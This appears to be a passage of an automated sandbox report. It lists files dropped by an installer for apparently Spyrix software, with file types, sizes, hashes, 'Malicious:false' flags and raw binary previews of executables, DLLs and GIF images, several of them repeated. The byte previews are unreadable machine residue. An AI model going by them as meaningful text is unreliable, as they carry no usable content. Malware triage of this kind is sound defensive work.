                                                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...}..f.................rF...................F...@...........................,.......R..........@..........................|l&......@N.8............rQ..!...........`h......................l&..............................................................@F.........................@............@...PF......2..............@............@....F......J..............@.................G.....................@............P....H..H..................@.................H......"..............@.................H......$..............@.................H......$..............@............@....I..h...&..............@....rsrc.... ...@N.....................@................`h...+..B..............@....data....`...`&..`....K.............@....adata........,.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2012072
                                                                                                                                                                                                                                                          Entropy (8bit):6.507543848379717
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:I/+4IbyaBqP3uDjd5DGX0BcSRDEpMFWJQi2GstDTwT7ijxHviMgaMVp/bdK6dF3r:cKJ+SCpnZsgNdK48h9njDQBB
                                                                                                                                                                                                                                                          MD5:C0E67E8723775249CA0AE2C52E7EDD9E
                                                                                                                                                                                                                                                          SHA1:3C460DBE351520494B0DCD8CAF5E1B0A53ACD2E4
                                                                                                                                                                                                                                                          SHA-256:D73E36AC1840D1D34DDF62DF55A8CFD64C17FCA9C92C3159D891964C2A7D0C3F
                                                                                                                                                                                                                                                          SHA-512:1A5AFA83529DB0B4F573D1BBC38BDA6958BE6991343E76A267516043250CE960E859560EE9433DFB93EF42CDBF97DED87CB3871057C8C746C4A75E2AAF548FD4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......b..........................................@..........................@......$%...........@...............................;......l................!...`..|&...........................P...............................0..&....................text............................... ..`.itext........... .................. ..`.data....{.......|..................@....bss.....W...........|...................idata...;.......<...|..............@....didata.&....0......................@....tls....<....@...........................rdata.......P......................@..@.reloc..|&...`...(..................@..B.rsrc...l...........................@..@.............P......................@..@........................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5041576
                                                                                                                                                                                                                                                          Entropy (8bit):7.897794442025251
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:98304:qsV54zBHy/xGu5//Sjl9WBOo/lKCJPNKr0NPq5Csnm7vkj:Rj49SMuJ/pv9p1gEn2
                                                                                                                                                                                                                                                          MD5:5788EF0F651292941577684F0499B114
                                                                                                                                                                                                                                                          SHA1:81B688AE137BB2F79C44B8A22737CB1416D2C00B
                                                                                                                                                                                                                                                          SHA-256:625BC8352D48D8F0764CAD81AEE94217D4B139DFD00E51DCAA5128F36CD20952
                                                                                                                                                                                                                                                          SHA-512:7A71FD55F60A0B5CE82FF61381E73B38E16B495784739B0580D391FCD652A4C147FF8E558939B1AF4D085F749B6EE42C142D52037CA1BF0B61C64A49C3D2A7C3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....<.f..................,..X................,...@...................................M..........@..........................|...p.....5...............L..!............E.......................................................................................,......*..................@............@....,.....................@............0....,......H..............@............p... ......................@............P....0..<..................@.................0.....................@.................0.....................@.................1.....................@.................1.....................@....rsrc.........5.....................@................E...&... .............@....d....................G.............@....adata..........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):80
                                                                                                                                                                                                                                                          Entropy (8bit):4.849870364976637
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:HRAbABGQYmjzcSL0dyTKVQXGNErnVIXKobn:HRYFVmjzjL0dyTK6XaErVI9
                                                                                                                                                                                                                                                          MD5:7B7C177B6FA25296550B3643448FCA00
                                                                                                                                                                                                                                                          SHA1:FA9744B1844CA32600EE661081CA6BBFD1B317D4
                                                                                                                                                                                                                                                          SHA-256:F7B25ED414E8005EDDBBEA787FA3594C798FC7F683E77835DAA33635A395CE51
                                                                                                                                                                                                                                                          SHA-512:5F61FF8894C530B21F7E4646798ECFA65D88FF55AF807280AA16233818E0F0043EBE6BF764C48BEA4C160EDAA3800BD9894C1BD2D01370F7200CD5E718C7B74A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[InternetShortcut]..URL="https://www.spyrix.com/purchase.php?from=sfk_uninstall"
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):826775
                                                                                                                                                                                                                                                          Entropy (8bit):6.520580307753605
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:QJCoOO8Mh2X8Vy0JHfv3kDpigeLKh2R6fFQVp:QL8MFVym/kDpitLKZy
                                                                                                                                                                                                                                                          MD5:16A1612789DC9063EBEA1CB55433B45B
                                                                                                                                                                                                                                                          SHA1:438FDE2939BBB9B5B437F64F21C316C17CE4A7F6
                                                                                                                                                                                                                                                          SHA-256:6DEAEC2F96C8A1C20698A93DDD468D5447B55AC426DC381EEF5D91B19953BB7B
                                                                                                                                                                                                                                                          SHA-512:D727CE8CD793C09A8688ACCB7A2EB5D8F84CC198B8E9D51C21E2DFB11D850F3AC64A58D07FF7FE9D1A2FDB613567E4790866C08A423176216FF310BF24A5A7E3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...TM<W....*......!.....j.........................a.........................`.......#........ .........................................x.......................@/..................................................................................text...,i.......j..................`.P`.data................p..............@.`..rdata..............................@.`@.bss..................................`..edata...............f..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...x...........................@.0..reloc..@/.......0..................@.0B/4........... ......................@.@B/19.........0......................@..B/31..................j..............@..B/45.................................@..B/57.................................@.0B/70.....i.... ..........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):330752
                                                                                                                                                                                                                                                          Entropy (8bit):6.515569416355077
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:67uz8VUGgQvLpVZ0hRBbV94fT5fyEH1iiDDR/WzdHAjdqqI4PFtK9S7/Q0RHK9mo:uuwUGggLpVZ0NbV9CNfyEHAiDDR/Wzdt
                                                                                                                                                                                                                                                          MD5:CB66A1FEC9236CD46E2A3E5A00D887A5
                                                                                                                                                                                                                                                          SHA1:531113059786F73A8C2376E08A12E62970B41E51
                                                                                                                                                                                                                                                          SHA-256:73234A2B168E2CA92B2E09346C48FB85CF10085FAF76D7923257986B3F528E1C
                                                                                                                                                                                                                                                          SHA-512:F5E3AD6B8FD6DCE55C0596BAF6961F86CD98598075899C02FB0B5C32FAF26FEA80C7C348C08D5D5FE41D89D61D869CF27AB230962A896D085206A895881CD926
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hN.. ... ... ...[... ..q.... ..q.... ..q.... ...!.>. ..q..>. ..q.... ..q.... ..q.... .Rich.. .........................PE..L...L*.O...........!.........b......+........................................`.........................................p$...y..<.......8.................... ..D+...................................u..@...............P............................text...P........................... ..`.rdata..@...........................@..@.data...D\.......@..................@....rsrc...8...........................@..@.reloc...1... ...2..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 884 x 198
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):90361
                                                                                                                                                                                                                                                          Entropy (8bit):7.9769989580983625
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:Zy6BW/LDE6LyfJVEr+jMi2hm9YFrRUv9Ie2eIDtTER:M6eL46LCJVpCsy6IAIRe
                                                                                                                                                                                                                                                          MD5:3475836FCF6BBE603D1E83DD8A3C4765
                                                                                                                                                                                                                                                          SHA1:DD92253B2600C1612FDC657FFB41E4FD66352C6B
                                                                                                                                                                                                                                                          SHA-256:F8E582779693B4DAB740E13721093D9B8EB69DC0FF5CFACB5208C04321BA37F8
                                                                                                                                                                                                                                                          SHA-512:8AE5E48692962A7F8049521F3B3510F1F1B9EF7CAF4A40526D7D6286BBEB647CFA54D88AF9A8E03AD884A42AECBA677E0A229577A394CD228CDF98E0F99506E4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89at..........u.J................i]OOH..........mQ...K2..C$..............B*.p..X...dH....V<........M........%#"...........z.....[&....x8#.........`..............,$.....}}}.._...d0......Hw.hih...L..............xK..q..v.............e(......~......`.z`..........g.;".......t..........Y....r+.....q....xd...........R...........ad\.......WA......a...Y).R......3... .....]CHA6.......n............z ....a<..2.*b...................L0....%+...nst]cc......lnk..M..x....QD.....&........Y..;........syu^^X......~..........fnr..e..xL..................U.hV....`..j................D....g..R....^.....<5.vqCCC..84/..2..5../..;.....&....L%.r+...........).....................................................W..V.......v............R......WYW....?%.........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                          Entropy (8bit):4.248529327128576
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:N1KJS40dyTKVQXGNErnVernn:Cc40dyTK6XaErVer
                                                                                                                                                                                                                                                          MD5:8F1A40DDD71F7EA45DF0E2FE0BACA597
                                                                                                                                                                                                                                                          SHA1:E64C2983DE93F6566752E01BC0A2A5F3983759F6
                                                                                                                                                                                                                                                          SHA-256:2360EAEBD32653D08F75DB2F1C2AE67F4AE3906D09F94AD4C532BA35951553D1
                                                                                                                                                                                                                                                          SHA-512:C73BE7BE0C52CDAB4BA1E3022D9D1E1E2DBC897E34A4F243A7D8936BB7B4A2F46DF2BD1F6E7CA63F6A80C799E4EAD1EAEE38550683473EBF53FC8E2569112BBF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:http://www.spyrix.com/purchase.php?prg=sfk
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 327 x 57
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7609
                                                                                                                                                                                                                                                          Entropy (8bit):7.838852889190603
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:CRjl+OutIyaaHKip9QY5Lg6pWlicYMG5/b:OshLaIFUug6pGzo
                                                                                                                                                                                                                                                          MD5:359D85C48DCA7C9C529A7EC0F4D30DC4
                                                                                                                                                                                                                                                          SHA1:749EE1A5C90299C9360DD3131222CE92584FFCC2
                                                                                                                                                                                                                                                          SHA-256:03BBB9C7C115C8FD5E2FB573B86687AE27672C7F8B970FB9661E5007FC6E42BE
                                                                                                                                                                                                                                                          SHA-512:9494049C968B6BEE93090630086EB4D8129B48E5E6CBA3CF2E7EEF2114948316D0068F859594EA3A464AB2FE99510C1C94EEF786A933114C0CFC630C13435B1D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89aG.9....Gq.....$...Z...ud.........|.........,&..........M5.................g.........................yv.....6.............v.72......g.L........C.................T.......m...kg.......eX...X}.k..{................s.......{..........................................n...................C......ZU..................................................`......D@.M........z........F..........|..a....................i........................s.......UQ...............................4c...................?%....w.#Y.BBB.........000.........fff.....888TTTxxx.ZD..........................d.........................................................................r..*]....Q.....U..~............OM.......................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 884 x 198
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):90361
                                                                                                                                                                                                                                                          Entropy (8bit):7.9769989580983625
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:Zy6BW/LDE6LyfJVEr+jMi2hm9YFrRUv9Ie2eIDtTER:M6eL46LCJVpCsy6IAIRe
                                                                                                                                                                                                                                                          MD5:3475836FCF6BBE603D1E83DD8A3C4765
                                                                                                                                                                                                                                                          SHA1:DD92253B2600C1612FDC657FFB41E4FD66352C6B
                                                                                                                                                                                                                                                          SHA-256:F8E582779693B4DAB740E13721093D9B8EB69DC0FF5CFACB5208C04321BA37F8
                                                                                                                                                                                                                                                          SHA-512:8AE5E48692962A7F8049521F3B3510F1F1B9EF7CAF4A40526D7D6286BBEB647CFA54D88AF9A8E03AD884A42AECBA677E0A229577A394CD228CDF98E0F99506E4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89at..........u.J................i]OOH..........mQ...K2..C$..............B*.p..X...dH....V<........M........%#"...........z.....[&....x8#.........`..............,$.....}}}.._...d0......Hw.hih...L..............xK..q..v.............e(......~......`.z`..........g.;".......t..........Y....r+.....q....xd...........R...........ad\.......WA......a...Y).R......3... .....]CHA6.......n............z ....a<..2.*b...................L0....%+...nst]cc......lnk..M..x....QD.....&........Y..;........syu^^X......~..........fnr..e..xL..................U.hV....`..j................D....g..R....^.....<5.vqCCC..84/..2..5../..;.....&....L%.r+...........).....................................................W..V.......v............R......WYW....?%.........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 327 x 57
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7609
                                                                                                                                                                                                                                                          Entropy (8bit):7.838852889190603
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:CRjl+OutIyaaHKip9QY5Lg6pWlicYMG5/b:OshLaIFUug6pGzo
                                                                                                                                                                                                                                                          MD5:359D85C48DCA7C9C529A7EC0F4D30DC4
                                                                                                                                                                                                                                                          SHA1:749EE1A5C90299C9360DD3131222CE92584FFCC2
                                                                                                                                                                                                                                                          SHA-256:03BBB9C7C115C8FD5E2FB573B86687AE27672C7F8B970FB9661E5007FC6E42BE
                                                                                                                                                                                                                                                          SHA-512:9494049C968B6BEE93090630086EB4D8129B48E5E6CBA3CF2E7EEF2114948316D0068F859594EA3A464AB2FE99510C1C94EEF786A933114C0CFC630C13435B1D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89aG.9....Gq.....$...Z...ud.........|.........,&..........M5.................g.........................yv.....6.............v.72......g.L........C.................T.......m...kg.......eX...X}.k..{................s.......{..........................................n...................C......ZU..................................................`......D@.M........z........F..........|..a....................i........................s.......UQ...............................4c...................?%....w.#Y.BBB.........000.........fff.....888TTTxxx.ZD..........................d.........................................................................r..*]....Q.....U..~............OM.......................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                          Entropy (8bit):4.248529327128576
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:N1KJS40dyTKVQXGNErnVernn:Cc40dyTK6XaErVer
                                                                                                                                                                                                                                                          MD5:8F1A40DDD71F7EA45DF0E2FE0BACA597
                                                                                                                                                                                                                                                          SHA1:E64C2983DE93F6566752E01BC0A2A5F3983759F6
                                                                                                                                                                                                                                                          SHA-256:2360EAEBD32653D08F75DB2F1C2AE67F4AE3906D09F94AD4C532BA35951553D1
                                                                                                                                                                                                                                                          SHA-512:C73BE7BE0C52CDAB4BA1E3022D9D1E1E2DBC897E34A4F243A7D8936BB7B4A2F46DF2BD1F6E7CA63F6A80C799E4EAD1EAEE38550683473EBF53FC8E2569112BBF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:http://www.spyrix.com/purchase.php?prg=sfk
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 884 x 198
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):90699
                                                                                                                                                                                                                                                          Entropy (8bit):7.976611505014986
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:TO6fc7nz/3pXEtubO/n9l7STXTQXsxalgH8UsX4UzAY3p18N14e86zebLqDf:BEzzRXEtubO/yTXTlxbrUDcu/8v4e8AH
                                                                                                                                                                                                                                                          MD5:EF79CF8AABBC41E42025D3ACF51B36C9
                                                                                                                                                                                                                                                          SHA1:71940D0E9D230D295D8A89397DF4ED0BA5BD72DA
                                                                                                                                                                                                                                                          SHA-256:24D4AC7D4101A76F35F636660A92AD95E1C068065D17BB4F8CC27CD3C91402F8
                                                                                                                                                                                                                                                          SHA-512:E579BEED091D3A4068AE664640BA0EDCFB309F0C7142CD452B45F79A69B6423A8237D9256C9A0E3FFE4F22EBC1C01D26B2BE79FD7B3E3E9643A1142A997E5902
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89at.......s...............f[.......u..mQ...ONH.L1..C;................C+.qX....X.dH......W>...........M..........'&#.z....[&..x7".......................Y........+#{}}.......^...a.......hih...X..............zL....n..v..........e(........`.za..........j.7 .......m..........y.......u,......q....we.........T.............dd[.......WCi......e..Y*.R...4...!.....\BEC?..........n...............a>..b.Cy.............=CH.}.....M0....%+nst]dc......mpl.O...N..x....E?.....).....[..;.......sxq[^X......}.........c...fmr..~M..................L.k_...._..j.{.................D....f....a.....?(..{.|{974..5...../..;.....&....L%.r+...........).......................................................................W....v...............R...YYW.......?%.........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                          Entropy (8bit):4.248529327128576
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:N1KJS40dyTKVQXGNErnVernn:Cc40dyTK6XaErVer
                                                                                                                                                                                                                                                          MD5:8F1A40DDD71F7EA45DF0E2FE0BACA597
                                                                                                                                                                                                                                                          SHA1:E64C2983DE93F6566752E01BC0A2A5F3983759F6
                                                                                                                                                                                                                                                          SHA-256:2360EAEBD32653D08F75DB2F1C2AE67F4AE3906D09F94AD4C532BA35951553D1
                                                                                                                                                                                                                                                          SHA-512:C73BE7BE0C52CDAB4BA1E3022D9D1E1E2DBC897E34A4F243A7D8936BB7B4A2F46DF2BD1F6E7CA63F6A80C799E4EAD1EAEE38550683473EBF53FC8E2569112BBF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:http://www.spyrix.com/purchase.php?prg=sfk
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 327 x 57
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7829
                                                                                                                                                                                                                                                          Entropy (8bit):7.826687568770807
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:ZwZ+70N539DtmJu0clifT2eTb6uRM3Q6q:Z0+QNftOcloTBTtRMHq
                                                                                                                                                                                                                                                          MD5:241545A94AF6185978CFD96B32101E95
                                                                                                                                                                                                                                                          SHA1:75FC98239798D933FD87978D7545964CE0E611D8
                                                                                                                                                                                                                                                          SHA-256:01FD9E13EEF1D14C6C2B4E5EA16E40789FE5423715500C29A7DC58FDF2C1364F
                                                                                                                                                                                                                                                          SHA-512:1A127A5EB9573418B3301A0E498B5335AEE0E99F87C8B4C12B6907476D49D1781264700A692FBE24971D405695AAE9BD5C4F40E95D10A1F26CBB0818A32899E1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89aG.9...............g.............r...w................m.............$.....Z...ud.........|..............-(.......M5o...................h.............6{...........yu6.............w.83.........L.....>..d.........U....m...mj.......eYY~.k..{.............................w........c....................!r............p........W.........E.....ZU.......j.................................b.....Qw..D@.N......L.z......F.A...........|..N......f.............x.........].......UQ.........................................`.....?%.w.#Y....BBB...fff............000...TTT888.....xxx.ZD.....................b.....>j....Iq...................................................@l.......~........Q..U..............4c.........._......OM.................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                          Entropy (8bit):4.248529327128576
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:N1KJS40dyTKVQXGNErnVernn:Cc40dyTK6XaErVer
                                                                                                                                                                                                                                                          MD5:8F1A40DDD71F7EA45DF0E2FE0BACA597
                                                                                                                                                                                                                                                          SHA1:E64C2983DE93F6566752E01BC0A2A5F3983759F6
                                                                                                                                                                                                                                                          SHA-256:2360EAEBD32653D08F75DB2F1C2AE67F4AE3906D09F94AD4C532BA35951553D1
                                                                                                                                                                                                                                                          SHA-512:C73BE7BE0C52CDAB4BA1E3022D9D1E1E2DBC897E34A4F243A7D8936BB7B4A2F46DF2BD1F6E7CA63F6A80C799E4EAD1EAEE38550683473EBF53FC8E2569112BBF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:http://www.spyrix.com/purchase.php?prg=sfk
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 884 x 198
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):90699
                                                                                                                                                                                                                                                          Entropy (8bit):7.976611505014986
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:TO6fc7nz/3pXEtubO/n9l7STXTQXsxalgH8UsX4UzAY3p18N14e86zebLqDf:BEzzRXEtubO/yTXTlxbrUDcu/8v4e8AH
                                                                                                                                                                                                                                                          MD5:EF79CF8AABBC41E42025D3ACF51B36C9
                                                                                                                                                                                                                                                          SHA1:71940D0E9D230D295D8A89397DF4ED0BA5BD72DA
                                                                                                                                                                                                                                                          SHA-256:24D4AC7D4101A76F35F636660A92AD95E1C068065D17BB4F8CC27CD3C91402F8
                                                                                                                                                                                                                                                          SHA-512:E579BEED091D3A4068AE664640BA0EDCFB309F0C7142CD452B45F79A69B6423A8237D9256C9A0E3FFE4F22EBC1C01D26B2BE79FD7B3E3E9643A1142A997E5902
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89at.......s...............f[.......u..mQ...ONH.L1..C;................C+.qX....X.dH......W>...........M..........'&#.z....[&..x7".......................Y........+#{}}.......^...a.......hih...X..............zL....n..v..........e(........`.za..........j.7 .......m..........y.......u,......q....we.........T.............dd[.......WCi......e..Y*.R...4...!.....\BEC?..........n...............a>..b.Cy.............=CH.}.....M0....%+nst]dc......mpl.O...N..x....E?.....).....[..;.......sxq[^X......}.........c...fmr..~M..................L.k_...._..j.{.................D....f....a.....?(..{.|{974..5...../..;.....&....L%.r+...........).......................................................................W....v...............R...YYW.......?%.........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 327 x 57
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7829
                                                                                                                                                                                                                                                          Entropy (8bit):7.826687568770807
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:ZwZ+70N539DtmJu0clifT2eTb6uRM3Q6q:Z0+QNftOcloTBTtRMHq
                                                                                                                                                                                                                                                          MD5:241545A94AF6185978CFD96B32101E95
                                                                                                                                                                                                                                                          SHA1:75FC98239798D933FD87978D7545964CE0E611D8
                                                                                                                                                                                                                                                          SHA-256:01FD9E13EEF1D14C6C2B4E5EA16E40789FE5423715500C29A7DC58FDF2C1364F
                                                                                                                                                                                                                                                          SHA-512:1A127A5EB9573418B3301A0E498B5335AEE0E99F87C8B4C12B6907476D49D1781264700A692FBE24971D405695AAE9BD5C4F40E95D10A1F26CBB0818A32899E1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
